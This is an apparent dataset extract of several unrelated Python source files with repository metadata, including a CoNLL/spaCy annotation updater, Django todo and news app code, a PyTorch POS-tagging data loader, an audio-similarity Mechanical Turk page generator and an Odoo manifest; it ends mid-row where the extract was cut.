blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 5
283
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
41
| license_type
stringclasses 2
values | repo_name
stringlengths 7
96
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 58
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 12.7k
662M
⌀ | star_events_count
int64 0
35.5k
| fork_events_count
int64 0
20.6k
| gha_license_id
stringclasses 11
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 43
values | src_encoding
stringclasses 9
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 7
5.88M
| extension
stringclasses 30
values | content
stringlengths 7
5.88M
| authors
sequencelengths 1
1
| author
stringlengths 0
73
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0534f9aaf5c3f06811ec0812276d154c0a7d8db6 | 627a97a5bdf3834ec6c86c76ebde7cc9c5000792 | /conll_and_spacy.py | c2077df470c8f81998c85ae4f87ad58a6723ccb6 | [] | no_license | c0ntradicti0n/CONNLator | 3391c8a570023239078f5dac3bcec41297675d82 | 1cfe6e4b5fde88d7812c1877521535928bddd85f | refs/heads/master | 2020-04-20T06:39:05.313513 | 2019-02-01T11:51:35 | 2019-02-01T11:51:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,715 | py | import re
import os
from itertools import count
import numpy as np
import pandas as pd
import copy
import logging
logging.getLogger(__name__).addHandler(logging.NullHandler())
def find_position_in_doc_by_approx(doc, text_token, pos, deviation=10):
deviator = iterate_away(pos, deviation)
for p in deviator:
if p < 0:
continue
if p >= len(doc):
continue
if text_token == doc[p].text or ((text_token in ['’'] or len(text_token)<2) and text_token in doc[p].text):
return p
else:
logging.error("Token '%s' not seen in spacy doc (search tokens: '%s')! returning starting position, '%s" %
(text_token,
str([w.text for w in doc[pos - deviation:pos + deviation]]),
str(doc[pos])))
return pos
def iterate_away(pos, deviation):
yield pos
for d in range(1, deviation):
yield pos + d
yield pos - d
class ConllSpacyUpdater:
def __init__(self, import_dir = None, export_dir = None):
if not export_dir:
raise AttributeError("Export dir must be given!")
self.import_dir = import_dir
self.export_dir = export_dir
return None
def read_one_conll (fname):
sentence = []
conll_lines = []
with open(fname, 'r') as fh:
for i, line in enumerate (fh):
try:
sentence.append(re.search(r'(?:^\d+\t)([^\t]+)', line).group(1))
conll_lines.append(ConllSpacyUpdater.conll_line2match(line))
except AttributeError:
logging.error ("in file %s, line %d with line:'%s'" % (fname, i, line))
raise
if not line.strip():
line = last
break
last = line
pass
return conll_lines, " ".join(sentence)
def load_all_conlls (export_path):
all_sentences = []
all_conlls = []
import fnmatch
for filename in sorted(os.listdir(export_path), key =lambda x: int(''.join(filter(str.isdigit, x)) )):
if fnmatch.fnmatch(filename, '*.conll'):
filename = os.path.join(export_path, filename)
conll_lines, sentence = ConllSpacyUpdater.read_one_conll(filename)
all_sentences.append (sentence)
all_conlls.append (conll_lines)
return all_sentences, all_conlls
def load_conll (self, i, corpus_path):
if isinstance(i, list):
docs = []
for j in i:
print (j)
docs.append(self.load_conll(j, corpus_path))
return docs
fname = corpus_path + "/" + str (i) + '.conll'
sentence = []
last = ''
with open(fname, 'r') as fh:
for line in fh:
try:
sentence.append(re.search(r'(?:^\d+\t)([^\t]+)', line).group(1))
except AttributeError:
print (i, "'"+line+"'")
raise
if not line.strip():
line = last
break
last = line
pass
doc = self.nlp(" ".join(sentence))
new_doc = self.conll_over_spacy(doc, fname)
return new_doc
pattern = re.compile( r"""(?P<id>.*?) # quoted name
\t(?P<text>.*?) # whitespace, next bar, n1
\t(?P<nothing1>.*?)# whitespace, next bar, n1
\t(?P<pos_>.*?) # whitespace, next bar, n2
\t(?P<tag_>.*?) # whitespace, next bar, n1
\t(?P<nothing2>.*?)# whitespace, next bar, n1
\t(?P<head_id>.*?) # whitespace, next bar, n2
\t(?P<dep_>.*?) # whitespace, next bar, n2
\t(?P<spacy_i>.*?)# whitespace, next bar, n1
\t(?P<coreference>.*?)# whitespace, next bar, n1
""", re.VERBOSE)
col_set = ['i','text', 'lemma','pos','tag','nothing','head','dep','spacy_i','coreference']
def conll_line2match(line):
match = ConllSpacyUpdater.pattern.match(line)
return match
def conll_over_spacy(self, doc, dir, i, no_cols={}):
to_change = set(self.col_set) - set(no_cols)
fname = str (i) + '.conll'
path = dir + "/" + fname
# read conll_files, may manipulated over spacy
with open(path) as f:
for line in f:
match = ConllSpacyUpdater.conll_line2match(line)
i = int(match.group("id")) - 1
head_i = int(match.group("head_id")) - 1
doc[i].set_extension('coref', default = list(), force=True)
try:
if 'head' in to_change:
doc[i].head = doc[head_i]
if 'lemma' in to_change:
doc[i].lemma_ = match.group("pos_")
if 'pos' in to_change:
doc[i].pos_ = match.group("pos_")
if 'tag' in to_change:
doc[i].tag_ = match.group("tag_")
if 'dep' in to_change:
doc[i].dep_ = match.group("dep_")
#if 'spacy_i' in to_change:
# doc[i].i = match.group("spacy_i")
if 'coreference' in to_change:
doc[i]._.coref= match.group("coreference")
except IndexError:
raise ValueError("Shape of the spacy doc and conll file incongruent, look for the number of tokens! '%s'" % (str(doc)))
return doc
conll_format = "%d\t%s\t%s\t%s\t%s\t%s\t%d\t%s\t%s\t%s"
def export_dict (self, doc, index=None):
res = []
w_counter = count(0)
start_i = doc[0].i
for word in doc:
i = next(w_counter)
if word.head is word:
head_idx = 0
else:
head_idx = doc[i].head.i
# indices must be +1 because of the conll format
res.append(
{ 's_id' : index,
'i' : i+1,
'text' : word.text,
'lemma' : word.lemma_,
'pos' : word.pos_,
'tag' : word.tag_,
'unknown': '_',
'head' : head_idx - start_i + 1,
'dep' : word.dep_,
'corp_id': str(index)+'-'+str(word.i + 1),
'doc_i' : word.i,
#'coref' : coref
}
)
return res
def commonize_values (df, col_with_lists, col_to_index):
"""Select rows with overlapping values
"""
v = df.merge(df, on=col_with_lists)
common_cols = set(
np.sort(v.iloc[:, [0, -1]].query(str('%s_x != %s_y' % (col_to_index, col_to_index)) ), axis=1).ravel()
)
return df[df[col_to_index].isin(common_cols)].groupby(col_to_index)[col_with_lists].apply(list)
def explode(df, column_to_explode):
"""
Similar to Hive's EXPLODE function, take a column with iterable elements, and flatten the iterable to one element
per observation in the output table
:param df: A dataframe to explod
:type df: pandas.DataFrame
:param column_to_explode:
:type column_to_explode: str
:return: An exploded data frame
:rtype: pandas.DataFrame
"""
# Create a list of new observations
new_observations = list()
# Iterate through existing observations
for row in df.to_dict(orient='records'):
# Take out the exploding iterable
explode_values = row[column_to_explode]
del row[column_to_explode]
# Create a new observation for every entry in the exploding iterable & add all of the other columns
for explode_value in explode_values:
# Deep copy existing observation
new_observation = copy.deepcopy(row)
# Add one (newly flattened) value from exploding iterable
new_observation[column_to_explode] = explode_value
# Add to the list of new observations
new_observations.append(new_observation)
# Create a DataFrame
return_df = pd.DataFrame(new_observations)
# Return
return return_df
def annotate_corefs (self, doc, df):
df['coref'] = [[] for _ in range(len(df))]
def element_rest (l):
for i, e in enumerate (l):
yield e, l[:i]+l[i+1:]
def ref_from_row (r):
try:
row = df.query('doc_i in @r')
except KeyError:
print ("not found?")
if row.empty:
#logging.error("df empty?")
return "out of the margins"
return str(row.s_id.values[0] ) + "->" + "[" + str(row.i.values[0]) + ":" + str(row.i.values[-1]+1) + "]"
return ",".join(other_sents)
if doc._.has_coref:
for cl in doc._.coref_clusters:
for ment, rest_ments in element_rest (cl):
ids = range(ment.start, ment.end)
other_sents = [ref_from_row(range(r.start, r.end)) for r in rest_ments]
df.loc[df['doc_i'].isin(ids), 'coref'] += other_sents
df.coref = df.coref.apply (lambda x: ",".join(x) if x else '_')
return None
def write_conll_by_df_group(self, x):
x = x
conll_lines = []
for row in x.itertuples():
conll_lines.append(ConllSpacyUpdater.conll_format % (
row.i, # There's a word.i attr that's position in *doc*
row.text,
row.lemma,
row.pos, # Coarse-grained tag
row.tag, # Fine-grained tag
row.unknown,
row.head,
row.dep, # Relation
row.corp_id, # Generation_i
row.coref))
conll_path = self.export_dir + '/' + str(row.sent_id) + '.conll'
with open(conll_path, 'w+') as f:
f.write ("\n".join (conll_lines) +'\n')
return None
| [
"[email protected]"
] | |
7b3330cc8f55c31d955a9ab01ad82f02f6f12b1f | abaa0bf93a6e38a1dcb814cf5602943875201815 | /base/todo/urls.py | 482b20a54096f6645647461f9e4b60a78aae4897 | [] | no_license | Software78/todoapp | 5eeb650ff8b54988299515eb9aea560eca02ba40 | ccae67429147c5b3138b091fd7c2a0e93c9b568c | refs/heads/master | 2023-06-03T15:34:53.688563 | 2021-06-25T16:17:19 | 2021-06-25T16:17:19 | 380,277,135 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 413 | py | from django.urls import path
from django.urls.conf import include
from .views import *
urlpatterns = [
path('',Index,name='index'),
path('signup/',signup,name='signup'),
path("logout", logout, name="logout"),
path("update/<int:pk>", UpdateTask.as_view(), name="update"),
path("delete/<int:pk>", DeleteTask.as_view(), name="delete"),
path("create/", CreateTask.as_view(), name="create")
]
| [
"[email protected]"
] | |
0b054e68465391b0cd203f872d9230018d7c9c70 | 6a90c88cd3898a0936f83c7d2a8f713943d440db | /POSTagging-CharEmbed-CRF/dataloader/DataLoader.py | 17ec4ecac80046065e54c3979803a42fa4345c20 | [
"Apache-2.0"
] | permissive | LindgeW/POS-Tagging | 3be4bc5da30444b22722a15e3e39350231d42c76 | 358570047e8ad8403bcab4a1e9e3b082b9bea5fc | refs/heads/master | 2022-02-17T23:21:58.504742 | 2019-07-25T09:11:03 | 2019-07-25T09:11:03 | 186,325,676 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,501 | py | # from collections import Counter, defaultdict
import sys
sys.path.extend(['./', '../', '../../'])
import torch
import numpy as np
from dataloader.Vocab import POSVocab, CharVocab
# 一个Instance对应一行记录
class Instance(object):
def __init__(self, words, pos):
self.words = words # 保存词序列
self.pos = pos # 保存词序列对应的词性序列
def __str__(self):
return ' '.join([wd+'_'+p for wd, p in zip(self.words, self.pos)])
# 加载数据集,数据封装成Instance实体
def load_data(corpus_path):
insts = []
with open(corpus_path, 'r', encoding='utf-8', errors='ignore') as fin:
for line in fin:
tokens = line.strip().split()
words, pos = [], []
for token in tokens:
words.append(token.split('_')[0])
pos.append(token.split('_')[1])
insts.append(Instance(words, pos))
return insts
# 获取batch数据(思考:如何在后台异步加载数据prefetch?)
def get_batch(data, batch_size, shuffle=True):
if shuffle:
np.random.shuffle(data)
num_batch = int(np.ceil(len(data) / float(batch_size)))
for i in range(num_batch):
batch_data = data[i*batch_size: (i+1)*batch_size]
if shuffle:
np.random.shuffle(batch_data)
yield batch_data
# 创建词表
def create_vocab(corpus_path):
# words_counter = Counter()
# pos_counter = Counter()
words_set = set()
pos_set = set()
with open(corpus_path, 'r', encoding='utf-8', errors='ignore') as fin:
for line in fin:
tokens = line.strip().split()
for token in tokens:
wd, pos = token.split('_')
# words_counter[wd] += 1
# pos_counter[pos] += 1
words_set.add(wd)
pos_set.add(pos)
return POSVocab(words_set, pos_set)
# return POSVocab(words_counter, pos_counter)
def create_vocabs(corpus_path):
words_set = set()
char_set = set()
pos_set = set()
with open(corpus_path, 'r', encoding='utf-8', errors='ignore') as fin:
for line in fin:
tokens = line.strip().split()
for token in tokens:
wd, pos = token.split('_')
char_set.update([ch.strip() for ch in wd])
words_set.add(wd)
pos_set.add(pos)
return CharVocab(char_set), POSVocab(words_set, pos_set)
# def batch_variable(batch_data, vocab):
# batch_size = len(batch_data)
# max_len = max([len(inst.words) for inst in batch_data])
#
# wds_idxs = torch.zeros(batch_size, max_len, dtype=torch.long)
# pos_idxs = torch.zeros(batch_size, max_len, dtype=torch.long).fill_(-1)
# seq_lens = []
# for i, inst in enumerate(batch_data):
# seq_len = len(inst.words)
# seq_lens.append(seq_len)
# wds_idxs[i, :seq_len] = torch.LongTensor(vocab.word2index(inst.words))
# pos_idxs[i, :seq_len] = torch.LongTensor(vocab.pos2index(inst.pos))
#
# sorted_seq_lens, indices = torch.sort(torch.tensor(seq_lens), descending=True)
# _, unsorted_indices = torch.sort(indices) # 排序前的顺序
# wds_idxs = torch.index_select(wds_idxs, dim=0, index=indices)
# pos_idxs = torch.index_select(pos_idxs, dim=0, index=indices)
# pos_idxs = pos_idxs.flatten() # 展平成一维
#
# return wds_idxs, pos_idxs, sorted_seq_lens, unsorted_indices
# def batch_variable_mask(batch_data, vocab):
# batch_size = len(batch_data)
# max_len = max([len(inst.words) for inst in batch_data])
#
# wds_idxs = torch.zeros(batch_size, max_len, dtype=torch.long)
# pos_idxs = torch.zeros(batch_size, max_len, dtype=torch.long).fill_(-1)
# mask = torch.zeros(batch_size, max_len)
# seq_lens = []
# for i, inst in enumerate(batch_data):
# seq_len = len(inst.words)
# seq_lens.append(seq_len)
# wds_idxs[i, :seq_len] = torch.LongTensor(vocab.word2index(inst.words))
# pos_idxs[i, :seq_len] = torch.LongTensor(vocab.pos2index(inst.pos))
# mask[i, :seq_len] = torch.ones(seq_len)
# pos_idxs = pos_idxs.flatten() # 展平成一维
#
# return wds_idxs, pos_idxs, mask, seq_lens
# def batch_variable_mask_easy(batch_data, vocab):
# batch_size = len(batch_data)
# max_len = max([len(inst.words) for inst in batch_data])
#
# wds_idxs = torch.zeros(batch_size, max_len, dtype=torch.long)
# pos_idxs = torch.zeros(batch_size, max_len, dtype=torch.long).fill_(-1)
# seq_lens = torch.zeros(batch_size, )
# for i, inst in enumerate(batch_data):
# seq_len = len(inst.words)
# seq_lens[i] = seq_len
# wds_idxs[i, :seq_len] = torch.LongTensor(vocab.word2index(inst.words))
# pos_idxs[i, :seq_len] = torch.LongTensor(vocab.pos2index(inst.pos))
# pos_idxs = pos_idxs.flatten() # 展平成一维
#
# return wds_idxs, pos_idxs, seq_lens
def pred_data_variable(insts, vocab, char_vocab):
batch_size = len(insts)
max_seq_len, max_wd_len = 0, 0
for inst in insts:
if len(inst.words) > max_seq_len:
max_seq_len = len(inst.words)
for wd in inst.words:
if len(wd) > max_wd_len:
max_wd_len = len(wd)
wds_idxs = torch.zeros(batch_size, max_seq_len, dtype=torch.long)
char_idxs = torch.zeros((batch_size, max_seq_len, max_wd_len), dtype=torch.long)
seq_lens = torch.zeros(batch_size, )
for i, inst in enumerate(insts):
seq_len = len(inst.words)
seq_lens[i] = seq_len
for j, wd in enumerate(inst.words):
char_idxs[i, j, :len(wd)] = torch.tensor(char_vocab.char2idx(wd), dtype=torch.long)
wds_idxs[i, :seq_len] = torch.tensor(vocab.word2index(inst.words), dtype=torch.long)
return wds_idxs, char_idxs, seq_lens
def batch_variable_mask_easy(batch_data, vocab, char_vocab):
batch_size = len(batch_data)
max_seq_len, max_wd_len = 0, 0
for inst in batch_data:
if len(inst.words) > max_seq_len:
max_seq_len = len(inst.words)
for wd in inst.words:
if len(wd) > max_wd_len:
max_wd_len = len(wd)
wds_idxs = torch.zeros(batch_size, max_seq_len, dtype=torch.long)
char_idxs = torch.zeros((batch_size, max_seq_len, max_wd_len), dtype=torch.long)
pos_idxs = torch.zeros(batch_size, max_seq_len, dtype=torch.long).fill_(-1)
mask = torch.zeros(batch_size, max_seq_len, dtype=torch.uint8)
seq_lens = torch.zeros(batch_size, dtype=torch.int)
# wd_lens = torch.zeros(batch_size, max_seq_len, dtype=torch.uint8)
for i, inst in enumerate(batch_data):
seq_len = len(inst.words)
seq_lens[i] = seq_len
for j, wd in enumerate(inst.words):
wd_len = len(wd)
char_idxs[i, j, :wd_len] = torch.tensor(char_vocab.char2idx(wd), dtype=torch.long)
# wd_lens[i, j] = wd_len
wds_idxs[i, :seq_len] = torch.tensor(vocab.word2index(inst.words), dtype=torch.long)
pos_idxs[i, :seq_len] = torch.tensor(vocab.pos2index(inst.pos), dtype=torch.long)
mask[i, :seq_len].fill_(1)
return wds_idxs, char_idxs, pos_idxs, mask, seq_lens
| [
"[email protected]"
] | |
a9b647a1a7d01d0fa4c8e0864c95f9bfe21b1832 | 9f019d4846dd48d1817e36a2dcb23d8456531f2f | /botify_docs/wsgi.py | ea562c977bc3b069457272bd53b94c1be9446759 | [] | no_license | botify-hq/developers-docs | ca1a5b240c8bae0103db86e4f601b67fad3a4865 | 6a2a8eb6cf2fd957cd4768623d9df035d92b9198 | refs/heads/master | 2023-05-04T13:59:10.225927 | 2021-08-12T12:44:46 | 2021-08-12T12:44:46 | 49,753,427 | 2 | 2 | null | 2023-04-16T23:12:03 | 2016-01-16T01:08:14 | JavaScript | UTF-8 | Python | false | false | 489 | py | """
WSGI config for botify_docs project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/howto/deployment/wsgi/
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "botify_docs.settings")
from django.core.wsgi import get_wsgi_application
from whitenoise.django import DjangoWhiteNoise
application = get_wsgi_application()
application = DjangoWhiteNoise(application) | [
"[email protected]"
] | |
600942b5dd907bd8a3787e1534df6759ee55b663 | 1c314814e976134af5a4306582823fe6892d0930 | /create_similarity_hit.py | 7acbae527cd7be832a916aa306e70b1e6ad84338 | [] | no_license | floraxue/blow-mel-MOS | 7dcc19f1c194d437c1ba93a472a4c8845d9e8094 | 6bad9d10704b4ef9abb4ed59541f066cdcd27079 | refs/heads/master | 2022-10-02T09:11:09.020958 | 2020-06-05T15:21:49 | 2020-06-05T15:21:49 | 265,772,107 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,799 | py | import boto3
# from boto.mturk.connection import MTurkConnection
# from boto.mturk.question import HTMLQuestion
import numpy as np
import random
import os
import argparse
from mturk_similarity_html import *
tests_f_dir = 'audio_files/tests_f'
tests_m_dir = 'audio_files/tests_m'
EXTENSION = '.wav'
def create_div(divname, expname, dirname_pair, fname_pair):
audio_controls = [
audio_ctrl.format(expname=expname, fname=fname_pair[0],
dirname=dirname_pair[0],
divname=divname+'_audiosrc_vc'),
audio_ctrl.format(expname=expname, fname=fname_pair[1],
dirname=dirname_pair[1],
divname=divname+'_audiosrc_t')
]
random.shuffle(audio_controls)
radio_control = radio_ctrl.format(divname=divname+'_radio',
expname=expname,
fname=fname_pair[0].split('.')[0])
div = q_div.format(divname=divname+'_div',
audio_control1=audio_controls[0],
audio_control2=audio_controls[1],
radio_control=radio_control)
return div
def create_tests():
test_f_names = [fn for fn in os.listdir(tests_f_dir) if fn.endswith(EXTENSION)]
test_m_names = [fn for fn in os.listdir(tests_m_dir) if fn.endswith(EXTENSION)]
sel_f = np.random.choice(test_f_names, size=3, replace=False)
sel_m = np.random.choice(test_m_names, size=3, replace=False)
goods = [(sel_f[0], sel_f[0]), (sel_m[0], sel_m[0])]
bads = [(sel_f[1], sel_m[1]), (sel_f[2], sel_m[2])]
divs = [
create_div(divname='test1', expname='GT', fname_pair=goods[0],
dirname_pair=('tests_f', 'tests_f')),
create_div(divname='test2', expname='GT', fname_pair=goods[1],
dirname_pair=('tests_m', 'tests_m')),
create_div(divname='test3', expname='bad', fname_pair=bads[0],
dirname_pair=('tests_f', 'tests_m')),
create_div(divname='test4', expname='bad', fname_pair=bads[1],
dirname_pair=('tests_f', 'tests_m'))
]
return divs
def create_sim_question(expname):
divs = create_tests()
for i in range(10):
divs.append(create_div(divname='real'+str(i),
expname=expname,
fname_pair=('unknown_vc', 'unknown_t'),
dirname_pair=(expname, 'originals')))
np.random.shuffle(divs)
real_fns = ""
for fn in os.listdir('audio_files/' + expname):
real_fns += fn + ","
real_fns = real_fns[:-1]
original_fns = ""
for fn in os.listdir('audio_files/originals'):
original_fns += fn + ","
original_fns = original_fns[:-1]
hidden_div = filenames_div.format(real_fns=real_fns,
original_fns=original_fns)
question_html_value = html_start
question_html_value += hidden_div
for i in range(len(divs)):
question_html_value += divs[i]
question_html_value += html_end.format(fill_audios_js=experiment_js)
return question_html_value
def create_sim_source_gt_to_target_gt(expname):
divs = create_tests()
for i in range(10):
divs.append(create_div(divname='real'+str(i),
expname=expname,
fname_pair=('unknown_vc', 'unknown_t'),
dirname_pair=(expname, 'originals')))
np.random.shuffle(divs)
real_fns = ""
for fn in os.listdir('audio_files/blow_baseline'):
real_fns += fn + ","
real_fns = real_fns[:-1]
original_fns = ""
for fn in os.listdir('audio_files/originals'):
original_fns += fn + ","
original_fns = original_fns[:-1]
hidden_div = filenames_div.format(real_fns=real_fns,
original_fns=original_fns)
question_html_value = html_start
question_html_value += hidden_div
for i in range(len(divs)):
question_html_value += divs[i]
html_end_filled = html_end.replace('{fill_audios_js}', source_gt_target_gt_js)
question_html_value += html_end_filled
return question_html_value
def create_sim_target_gt_to_target_gt(expname):
divs = create_tests()
for i in range(10):
divs.append(create_div(divname='real'+str(i),
expname=expname,
fname_pair=('unknown_vc', 'unknown_t'),
dirname_pair=('target_gt1', 'target_gt2')))
np.random.shuffle(divs)
real_fns = ""
for fn in os.listdir('audio_files/blow_baseline'):
if fn.endswith('.wav'):
real_fns += fn + ","
real_fns = real_fns[:-1]
original_fns = ""
for fn in os.listdir('audio_files/originals'):
original_fns += fn + ","
original_fns = original_fns[:-1]
hidden_div = filenames_div.format(real_fns=real_fns,
original_fns=original_fns)
question_html_value = html_start
question_html_value += hidden_div
for i in range(len(divs)):
question_html_value += divs[i]
html_end_filled = html_end.replace('{fill_audios_js}', target_gt_target_gt_js)
question_html_value += html_end_filled
return question_html_value
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='')
parser.add_argument("--expname", type=str, required=True)
args = parser.parse_args()
# q = create_sim_question(args.expname)
# with open("gen_sim_mturk.html", "w") as fp:
# fp.write(q)
q = create_sim_source_gt_to_target_gt(args.expname)
with open("gen_sim_mturk_tgt_tgt.html", "w") as fp:
fp.write(q)
| [
"[email protected]"
] | |
95a161b0ba89a5c19ce9746208bba8f68afc9bbf | c94d54996e22eb49eee140bd42cae8d472fa6d7b | /moderate_problems/master_mind.py | f4fa3aea23a25e0b6f9c409d111fa65394c8a51a | [] | no_license | nirjharij/cracking-the-coding-interview-in-python | 7b9e116c7f0ba47e25072ef245d33370c7b3df08 | 74738eba62fa7683610ea12b00842889251eebcc | refs/heads/master | 2023-04-10T02:04:40.347851 | 2020-12-03T10:56:52 | 2020-12-03T10:56:52 | 360,791,802 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 981 | py | def result(guess, soln):
guess_dict = {}
for i in range(len(guess)):
item = guess[i]
if item in guess_dict:
guess_dict[item].append(i)
else:
guess_dict[item] = [i]
soln_dict = {}
for i in range(len(soln)):
item = soln[i]
if item in soln_dict:
soln_dict[item].append(i)
else:
soln_dict[item] = [i]
hits = 0
pseudo_hits = 0
for item in soln_dict:
soln_index = soln_dict[item]
guess_index = guess_dict.get(item, None)
if guess_index:
match_index = set(soln_index).intersection(set(guess_index))
if match_index:
hits += len(match_index)
if len(match_index) < len(guess_index):
pseudo_hits += len(guess_index) - len(match_index)
else:
pseudo_hits += len(guess_index)
print(hits)
print(pseudo_hits)
result("RGGB", "RGGB")
| [
"[email protected]"
] | |
80a9ea7c9a085007351efe187574651f70c7efa9 | 2dce8389133562c48c183ef9fb89e053b7a3b6d1 | /manage.py | 53913bb9d1e3997d944e151a66af49fb97eee9cf | [] | no_license | Shatki/backend-evo | a742a9daaacc0a283529c47737057ee1f10228c0 | a977b6e346d73db53a21cc1aad094a377041f362 | refs/heads/master | 2020-06-20T09:41:27.838131 | 2019-12-02T06:05:59 | 2019-12-02T06:05:59 | 197,081,088 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 804 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "evotor.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| [
"[email protected]"
] | |
9dbbdac98da857411f92948a45a89e85d33b525f | f876239ac47cfa201f88e8148bcce2884f6fcadc | /jsonc/generators/models.py | 81de422554aa8b658a9337cd4abd2938301af61a | [] | no_license | iancarv/JSON-C | 481ea490c9d4dae5a2738eb4e5f4eb4abb1d94c2 | fed862cd0630dbd90650c29037f3d82b6f9e3262 | refs/heads/master | 2021-01-10T10:17:25.241750 | 2016-02-18T16:39:15 | 2016-02-18T16:39:15 | 51,881,222 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 607 | py | class Class(object):
"""docstring for Class"""
def __init__(self, name, Decorator=None, Superclass='object', Properties={}):
super(Class, self).__init__()
self.name = name
self.decorator = Decorator
self.superclass = Superclass
self.properties = []
for name, prop in Properties.items():
p = Property(name, **prop)
self.properties.append(p)
class Property(object):
"""docstring for Property"""
def __init__(self, name, Type, Default=None, Decorator=None):
super(Property, self).__init__()
self.name = name
self.t = Type
self.default = Default
self.decorator = Decorator
| [
"[email protected]"
] | |
14467e999e58538df3a9ace7cfbd2368c1054127 | 3f9d28984403cdd84b984d7a82eb6136018966a4 | /report_account_header/__manifest__.py | 2d4752617140bbb3d923feca507bd5b6df96d207 | [] | no_license | joevm018/temasq | bee1c69aee4c87de415e66e236b40c28201e2951 | 74f003c6a009716bf26a6438f5ee48e7dfcbb030 | refs/heads/master | 2023-03-18T23:42:13.598853 | 2021-03-11T11:35:16 | 2021-03-11T11:35:16 | 346,671,390 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,371 | py | # -*- coding: utf-8 -*-
##############################################################################
#
# Author: Al Kidhma Group
# you can modify it under the terms of the GNU LESSER
# GENERAL PUBLIC LICENSE (LGPL v3), Version 3.
#
# It is forbidden to publish, distribute, sublicense, or sell copies
# of the Software or modified copies of the Software.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU LESSER GENERAL PUBLIC LICENSE (LGPL v3) for more details.
#
# You should have received a copy of the GNU LESSER GENERAL PUBLIC LICENSE
# GENERAL PUBLIC LICENSE (LGPL v3) along with this program.
# If not, see <https://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Modified Report Letterheads',
'version': '10.0',
'category': 'Generic Modules/Others',
'sequence': 2,
'summary': 'Manage Reporting',
'description': """
Sales Reports
""",
'author': 'Al Kidhma Group',
'depends': ['report','account', 'base'],
'data': [
'views/report_templates.xml',
],
'qweb': [],
'installable': True,
'application': True,
'auto_install': False,
}
| [
"[email protected]"
] | |
87e29c358714d587181ceb01527a7a958385f00a | 22298f9b11ea3949989942797666239bc52fb12f | /news/views.py | d507c9f360355e5ea8e2851df6aa1e0ea96bd2b7 | [] | no_license | AlexPyDev/Task | 6694914260952b1d471cac9fb1b36bda6965f47f | e968463ad5f2b210cdeb64c98ab066a8506ab61e | refs/heads/master | 2022-12-14T14:21:11.103386 | 2019-10-29T10:46:07 | 2019-10-29T10:46:07 | 216,048,923 | 0 | 0 | null | 2022-04-22T22:30:08 | 2019-10-18T15:01:00 | Python | UTF-8 | Python | false | false | 1,895 | py | from django.contrib.auth.decorators import login_required
from django.shortcuts import render, redirect, get_object_or_404
from .models import Article
from .form import ArticleForm, PostForm
from profiles.tasks import send_email
def index(request):
articles = Article.objects.order_by('id').all()
return render(request, 'news/index.html', {'articles': articles})
@login_required(login_url='/profile/login/')
def create_article(request):
if request.method == 'POST':
form = ArticleForm(request.POST)
if form.is_valid():
article = form.save(commit=False)
article.created_by = request.user
# Set True to cancel moderation if need
if not request.user.extendeduserdata.role.moderation:
article.is_published = True
article.save()
return redirect('news:index')
else:
form = ArticleForm()
return render(request, 'news/new_article.html', {'form': form})
def article_posts(request, article_pk):
article = get_object_or_404(Article, pk=article_pk)
posts = article.posts.order_by('id')
return render(request, 'news/article_posts.html', {'article': article, 'posts': posts})
@login_required(login_url='/profile/login/')
def reply_article(request, article_pk):
article = get_object_or_404(Article, pk=article_pk)
if request.method == 'POST':
form = PostForm(request.POST)
if form.is_valid():
post = form.save(commit=False)
post.article = article
post.created_by = request.user
post.save()
send_email(article.created_by.email, f"You have reply in article '{article.title}'")
return redirect('news:article_posts', article_pk=article.pk)
else:
form = PostForm()
return render(request, 'news/reply_article.html', {'form': form, 'article': article})
| [
"[email protected]"
] | |
68f4037aa526aad531757e9a55837c620b165268 | 97e7c5b72154c3fa89c95d7fb4ef4eb295a706ab | /at/ABC/ABC_085_C.py | a980a4f201ebbeb99107255bb50269c18f4e300a | [] | no_license | tamuraryo0126/programing | d679e4c78d970eee45e7524c7a3d7290f7fa6d14 | 55c4b2a7fb349723626419a26ba1fa4065e46695 | refs/heads/master | 2020-03-21T15:00:20.478885 | 2018-11-29T04:37:09 | 2018-11-29T04:37:09 | 138,688,605 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 164 | py | N,Y=map(int,input().split())
for i in range(N+1):
for j in range(N+1-i):
if 10000*i+5000*j+1000*(N-i-j)==Y: print(i,j,(N-i-j));quit()
print("-1 -1 -1")
| [
"[email protected]"
] | |
ed7cb93e2ed6141fbeaa78fef4dea002f0fc856e | 202e31dd277cd08b1e65f6e990c232602163a529 | /godot_rl_agents/tests/zeb_test_ray_wrapper.py | 7c31d3f0e03174210342bb0cd0ab13520b4b5034 | [
"MIT",
"CC-BY-3.0",
"LicenseRef-scancode-unknown-license-reference",
"CC-BY-4.0"
